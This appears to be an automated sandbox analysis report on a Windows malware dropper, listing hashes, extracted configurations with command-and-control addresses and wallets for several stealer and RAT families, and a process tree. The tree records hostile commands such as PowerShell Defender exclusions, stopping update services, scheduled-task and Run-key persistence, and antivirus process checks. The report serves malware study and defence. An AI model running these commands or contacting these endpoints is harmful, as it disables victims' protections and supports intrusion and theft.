Resubmissions

15-11-2024 19:06

241115-xr6q5szdnf 10

14-11-2024 23:35

241114-3lfknavfqg 10

14-11-2024 23:26

241114-3eysnavfje 10

14-11-2024 23:12

241114-26znlavdqq 10

Analysis

  • max time kernel
    266s
  • max time network
    270s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15-11-2024 19:06

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

stealc

Botnet

bbb7

C2

http://213.109.147.66

Attributes
  • url_path

    /73de3362ad1122cd.php

Extracted

Family

phorphiex

C2

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9

AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z

LTK4xdKPAgFHPLan8kriAD7eY4heyy73mB

MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q

4BB7ckkaPTyADc8trtuwDoZxywaR4eNL5cDJ3KBjq9GraN4mUFztf7mLS7WgT7Bh7uPqpjvA4ypVwXKCJ1vvLWWAFvSmDoD

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3BiS1jaRpWtkqtfZGp9f1rXXts5DyUkaBX

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2

bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr

bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd

Attributes
  • mutex

    0t6rv5xwbh

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

Mutex

8TdjLZxCzOjI

Attributes
  • delay

    3

  • install

    true

  • install_file

    client.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://89.197.154.116:7810/mkz1k28a5hVWXldfMKSuWQDmK7fiEd5xuDSo_iL2psuWuGxHGmOnGPc6Ycs357XSfevzTTr7C2_5P

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

192.168.31.99:4782

2001:4bc9:1f98:a4e::676:4782

255.255.255.0:4782

fe80::cabf:4cff:fe84:9572%17:4782

Mutex

1f65a787-81b8-4955-95e4-b7751e10cd50

Attributes
  • encryption_key

    A0B82A50BBC49EC084E3E53A9E34DF58BD7050B9

  • install_name

    Java Updater.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Java Updater

  • subdirectory

    SubDir

Extracted

Family

xworm

C2

mylogsprvt.zapto.org:8899

157.66.26.208:8848

Mutex

SmH2L0949LC6zVSS

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

redline

Botnet

newest

C2

mylogsprvt.zapto.org:45630

Extracted

Family

quasar

Version

1.4.1

Botnet

Java

C2

dez345-37245.portmap.host:37245

Mutex

f0e53bcd-851e-44af-8fd5-07d8ab5ed968

Attributes
  • encryption_key

    65439CE7DEF3E0FAF01C526FEA90388C9FD487A1

  • install_name

    java.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    java ©

  • subdirectory

    Programfiles

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Xworm Payload 4 IoCs
  • Detects ZharkBot payload 1 IoCs

    ZharkBot is a botnet written C++.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Modifies security service 2 TTPs 2 IoCs
  • Phorphiex family
  • Phorphiex payload 3 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 6 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Windows security bypass 2 TTPs 12 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • ZharkBot

    ZharkBot is a botnet written C++.

  • Zharkbot family
  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 4 TTPs
  • Drops startup file 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Windows security modification 2 TTPs 14 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops autorun.inf file 1 TTPs 5 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 11 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies registry class 9 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 23 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Executes dropped EXE
    PID:1208
    • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
      "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2644
        • C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"
          4⤵
          • Executes dropped EXE
          PID:2020
      • C:\Users\Admin\AppData\Local\Temp\Files\Session-https.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\Session-https.exe"
        3⤵
        • Executes dropped EXE
        PID:2532
      • C:\Users\Admin\AppData\Local\Temp\Files\1.exe
        "C:\Users\Admin\AppData\Local\Temp\Files\1.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1676
        • C:\Windows\sysklnorbcv.exe
          C:\Windows\sysklnorbcv.exe
          4⤵
          • Modifies security service
          • Windows security bypass
          • Executes dropped EXE
          • Loads dropped DLL
          • Windows security modification
          • Suspicious use of WriteProcessMemory
          PID:1756
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2992
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3064
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1000
            • C:\Windows\SysWOW64\sc.exe
              sc stop UsoSvc
              6⤵
              • Launches sc.exe
              • System Location Discovery: System Language Discovery
              PID:1436
            • C:\Windows\SysWOW64\sc.exe
              sc stop WaaSMedicSvc
              6⤵
              • Launches sc.exe
              • System Location Discovery: System Language Discovery
              PID:1960
            • C:\Windows\SysWOW64\sc.exe
              sc stop wuauserv
              6⤵
              • Launches sc.exe
              • System Location Discovery: System Language Discovery
              PID:1968
            • C:\Windows\SysWOW64\sc.exe
              sc stop DoSvc
              6⤵
              • Launches sc.exe
              • System Location Discovery: System Language Discovery
              PID:1752
            • C:\Windows\SysWOW64\sc.exe
              sc stop BITS
              6⤵
              • Launches sc.exe
              • System Location Discovery: System Language Discovery
              PID:872
          • C:\Users\Admin\AppData\Local\Temp\123264690.exe
            C:\Users\Admin\AppData\Local\Temp\123264690.exe
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2076
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
              6⤵
                PID:2992
                • C:\Windows\system32\reg.exe
                  reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                  7⤵
                    PID:2636
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                  6⤵
                    PID:2816
                    • C:\Windows\system32\schtasks.exe
                      schtasks /delete /f /tn "Windows Upgrade Manager"
                      7⤵
                        PID:944
                  • C:\Users\Admin\AppData\Local\Temp\781431589.exe
                    C:\Users\Admin\AppData\Local\Temp\781431589.exe
                    5⤵
                    • Executes dropped EXE
                    PID:1452
                  • C:\Users\Admin\AppData\Local\Temp\1628723224.exe
                    C:\Users\Admin\AppData\Local\Temp\1628723224.exe
                    5⤵
                    • Executes dropped EXE
                    PID:3644
                  • C:\Users\Admin\AppData\Local\Temp\1146015314.exe
                    C:\Users\Admin\AppData\Local\Temp\1146015314.exe
                    5⤵
                    • Executes dropped EXE
                    PID:2160
              • C:\Users\Admin\AppData\Local\Temp\Files\univ.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\univ.exe"
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1816
              • C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2036
              • C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe
                "C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"
                3⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:2948
                • C:\Windows\sysnldcvmr.exe
                  C:\Windows\sysnldcvmr.exe
                  4⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: SetClipboardViewer
                  PID:2796
                  • C:\Users\Admin\AppData\Local\Temp\1418522541.exe
                    C:\Users\Admin\AppData\Local\Temp\1418522541.exe
                    5⤵
                    • Executes dropped EXE
                    PID:2376
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                      6⤵
                        PID:6008
                        • C:\Windows\system32\reg.exe
                          reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                          7⤵
                            PID:5680
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                          6⤵
                            PID:6060
                            • C:\Windows\system32\schtasks.exe
                              schtasks /delete /f /tn "Windows Upgrade Manager"
                              7⤵
                                PID:5412
                          • C:\Users\Admin\AppData\Local\Temp\2993410356.exe
                            C:\Users\Admin\AppData\Local\Temp\2993410356.exe
                            5⤵
                            • Executes dropped EXE
                            PID:3516
                          • C:\Users\Admin\AppData\Local\Temp\775131445.exe
                            C:\Users\Admin\AppData\Local\Temp\775131445.exe
                            5⤵
                            • Executes dropped EXE
                            PID:4188
                          • C:\Users\Admin\AppData\Local\Temp\2350019260.exe
                            C:\Users\Admin\AppData\Local\Temp\2350019260.exe
                            5⤵
                            • Executes dropped EXE
                            PID:3608
                      • C:\Users\Admin\AppData\Local\Temp\Files\Terminal_9235.exe
                        "C:\Users\Admin\AppData\Local\Temp\Files\Terminal_9235.exe"
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2516
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "client" /tr '"C:\Users\Admin\AppData\Roaming\client.exe"' & exit
                          4⤵
                            PID:2648
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /tn "client" /tr '"C:\Users\Admin\AppData\Roaming\client.exe"'
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:2136
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpAD8E.tmp.bat""
                            4⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:2164
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout 3
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Delays execution with timeout.exe
                              PID:2464
                            • C:\Users\Admin\AppData\Roaming\client.exe
                              "C:\Users\Admin\AppData\Roaming\client.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2284
                        • C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe
                          "C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"
                          3⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          PID:1616
                          • C:\Windows\sysppvrdnvs.exe
                            C:\Windows\sysppvrdnvs.exe
                            4⤵
                            • Modifies security service
                            • Windows security bypass
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Windows security modification
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: SetClipboardViewer
                            PID:2104
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:2528
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2572
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:2548
                              • C:\Windows\SysWOW64\sc.exe
                                sc stop UsoSvc
                                6⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:2216
                              • C:\Windows\SysWOW64\sc.exe
                                sc stop WaaSMedicSvc
                                6⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:2008
                              • C:\Windows\SysWOW64\sc.exe
                                sc stop wuauserv
                                6⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:3008
                              • C:\Windows\SysWOW64\sc.exe
                                sc stop DoSvc
                                6⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:2020
                              • C:\Windows\SysWOW64\sc.exe
                                sc stop BITS /wait
                                6⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:1104
                            • C:\Users\Admin\AppData\Local\Temp\286830899.exe
                              C:\Users\Admin\AppData\Local\Temp\286830899.exe
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4452
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                6⤵
                                  PID:4536
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                    7⤵
                                      PID:4668
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                    6⤵
                                      PID:4612
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /delete /f /tn "Windows Upgrade Manager"
                                        7⤵
                                          PID:4688
                                    • C:\Users\Admin\AppData\Local\Temp\617623040.exe
                                      C:\Users\Admin\AppData\Local\Temp\617623040.exe
                                      5⤵
                                      • Executes dropped EXE
                                      PID:4040
                                    • C:\Users\Admin\AppData\Local\Temp\1423223895.exe
                                      C:\Users\Admin\AppData\Local\Temp\1423223895.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:2692
                                      • C:\Users\Admin\AppData\Local\Temp\1658518264.exe
                                        C:\Users\Admin\AppData\Local\Temp\1658518264.exe
                                        6⤵
                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3820
                                    • C:\Users\Admin\AppData\Local\Temp\104116141.exe
                                      C:\Users\Admin\AppData\Local\Temp\104116141.exe
                                      5⤵
                                      • Executes dropped EXE
                                      PID:3620
                                • C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1712
                                • C:\Users\Admin\AppData\Local\Temp\Files\Prototype.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Files\Prototype.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:376
                                • C:\Users\Admin\AppData\Local\Temp\Files\neonn.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Files\neonn.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1364
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "cmd" /c ping 127.0.0.1 -n 10 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "neon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\neon.exe"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • System Network Configuration Discovery: Internet Connection Discovery
                                    PID:5584
                                    • C:\Windows\SysWOW64\PING.EXE
                                      ping 127.0.0.1 -n 10
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      • System Network Configuration Discovery: Internet Connection Discovery
                                      • Runs ping.exe
                                      PID:5604
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "neon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\neon.exe"
                                      5⤵
                                      • Adds Run key to start application
                                      • System Location Discovery: System Language Discovery
                                      PID:2056
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                    4⤵
                                      PID:5688
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      4⤵
                                      • Suspicious use of SetThreadContext
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6044
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5036
                                    • C:\Users\Admin\AppData\Local\Temp\neon.exe
                                      "C:\Users\Admin\AppData\Local\Temp\neon.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4788
                                      • C:\Users\Admin\AppData\Local\Temp\neon.exe
                                        "C:\Users\Admin\AppData\Local\Temp\neon.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4860
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2704
                                  • C:\Users\Admin\AppData\Local\Temp\Files\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Files\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2500
                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                      "C:\Program Files\Internet Explorer\iexplore.exe" https://sms-szfang.com/register
                                      4⤵
                                      • Modifies Internet Explorer settings
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5796
                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5796 CREDAT:275457 /prefetch:2
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Modifies Internet Explorer settings
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5924
                                  • C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:5380
                                  • C:\Users\Admin\AppData\Local\Temp\Files\DeliciousPart.exe
                                    "C:\Users\Admin\AppData\Local\Temp\Files\DeliciousPart.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Drops file in Windows directory
                                    • System Location Discovery: System Language Discovery
                                    PID:5640
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c move Tall Tall.bat & Tall.bat
                                      4⤵
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:5788
                                      • C:\Windows\SysWOW64\tasklist.exe
                                        tasklist
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5816
                                      • C:\Windows\SysWOW64\findstr.exe
                                        findstr /I "wrsa opssvc"
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5824
                                      • C:\Windows\SysWOW64\tasklist.exe
                                        tasklist
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5904
                                      • C:\Windows\SysWOW64\findstr.exe
                                        findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5912
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c md 349877
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5944
                                      • C:\Windows\SysWOW64\findstr.exe
                                        findstr /V "ORDINANCECHILDHOODCONVERTENDORSED" Booty
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5952
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c copy /b ..\Norwegian + ..\Mysql + ..\Tours + ..\Awareness + ..\Picking K
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5972
                                      • C:\Users\Admin\AppData\Local\Temp\349877\Faced.pif
                                        Faced.pif K
                                        5⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:5984
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /create /tn "BioMind" /tr "wscript //B 'C:\Users\Admin\AppData\Local\BioTech Dynamics\BioMind.js'" /sc onlogon /F /RL HIGHEST
                                          6⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:6016
                                        • C:\Users\Admin\AppData\Local\Temp\349877\RegAsm.exe
                                          C:\Users\Admin\AppData\Local\Temp\349877\RegAsm.exe
                                          6⤵
                                          • Executes dropped EXE
